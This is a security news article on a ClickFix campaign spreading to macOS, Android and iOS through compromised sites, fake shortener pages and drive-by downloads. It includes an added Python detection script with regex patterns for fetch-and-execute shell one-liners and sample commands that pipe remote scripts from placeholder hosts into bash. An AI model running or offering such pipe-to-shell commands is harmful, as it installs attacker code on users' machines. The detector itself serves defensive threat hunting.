Devious New ClickFix Malware Variant Targets macOS, Android, and iOS Using Browser-Based Redirections
The infamous hacking technique known as ClickFix has evolved, experts have warned, with new research revealing that it now targets not only Windows devices but also macOS, iOS, and Android devices. The malicious technique tricks users into running malware by presenting it as a legitimate fix for a problem.
According to c/side, the researchers behind the study, the new attack method starts with a compromised website. Threat actors inject JavaScript code that redirects users to a new browser tab when they click on certain elements on the page. The new tab then displays a page that looks like a legitimate URL shortener, complete with a message instructing users to copy and paste a link into their browser. However, doing so triggers yet another redirect, leading to a download page.
Here's where the technique diverges depending on the operating system of the victim. On macOS, the attack leads to a terminal command that fetches and executes a malicious shell script, which has already been flagged by multiple antivirus programs as suspicious.
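As an added example (not from c/side's research or the original article), the macOS step can be hunted for in process command-line telemetry by matching shell one-liners that fetch a script and execute it. The patterns, sample command lines and `example.invalid` URLs below are constructed for illustration, since the article does not give the actual command.

```python
import re

# Building blocks (assumed tool names; extend for your environment).
FETCH = r"(?:curl|wget)\b"
SHELL = r"(?:\S*/)?(?:ba|z|k|da)?sh\b"   # sh, bash, zsh, ksh, dash, optional path

PATTERNS = {
    # curl ... | sh        (optionally via sudo)
    "pipe_to_shell": re.compile(rf"\b{FETCH}.*?\|\s*(?:sudo\s+)?{SHELL}"),
    # bash -c "$(curl ...)"   or   sh -c "`curl ...`"
    "command_substitution": re.compile(
        rf"(?:^|\s){SHELL}\s+-c\s+[\"']?(?:\$\(|`)\s*{FETCH}"),
    # curl -o f URL && chmod +x f && ./f
    "download_chmod_run": re.compile(
        rf"\b{FETCH}.*(?:&&|;)\s*chmod\s+\+x\b.*(?:&&|;)"),
    # bash <(curl ...)
    "process_substitution": re.compile(rf"(?:^|\s){SHELL}\s+<\(\s*{FETCH}"),
}

def classify(cmdline: str) -> list[str]:
    """Return the names of all fetch-and-execute patterns the command matches."""
    return sorted(name for name, rx in PATTERNS.items() if rx.search(cmdline))

def triage(events):
    """Keep only the command lines that match at least one pattern."""
    return [(e, hits) for e in events if (hits := classify(e))]

# Constructed sample command lines (not taken from the campaign).
SAMPLE = [
    "curl -fsSL https://downloads.example.invalid/fix.sh | bash",
    '/bin/bash -c "$(curl -fsSL https://downloads.example.invalid/fix.sh)"',
    "curl -o /tmp/update https://downloads.example.invalid/u && chmod +x /tmp/update && /tmp/update",
    "curl -s https://api.example.invalid/status | shasum -a 256",  # benign: piped to a hash tool
    "brew install wget",                                           # benign: no execution
    "git push origin main",                                        # benign: unrelated
]

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE):
        print(f"{','.join(hits):22} {cmd}")
```

Matches are triage leads rather than verdicts: legitimate installers use the same one-liners, so correlate a hit with the parent process (a terminal opened shortly after browser activity) and the download domain.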
But for Android and iOS users, the situation is even more concerning. The attack no longer requires any user interaction, making it a drive-by attack. This type of cyberattack sees malicious code executed or downloaded onto a device simply by visiting a compromised or malicious webpage, with no clicks, installs, or interaction required.
In this case, the site downloads a .TAR archive file containing malware, which has also been flagged by at least five antivirus programs. According to c/side, "This is a fascinating and evolving attack that demonstrates how attackers are expanding their reach." The study found that what started as a Windows-specific ClickFix campaign has now expanded its scope to target macOS, Android, and iOS devices.
This development highlights how quickly cyber threats evolve. As attackers continually adapt and improve their tactics, it's essential for users to remain vigilant and take steps to protect themselves. By staying informed and using reputable security software, individuals can reduce their risk of falling victim to these schemes.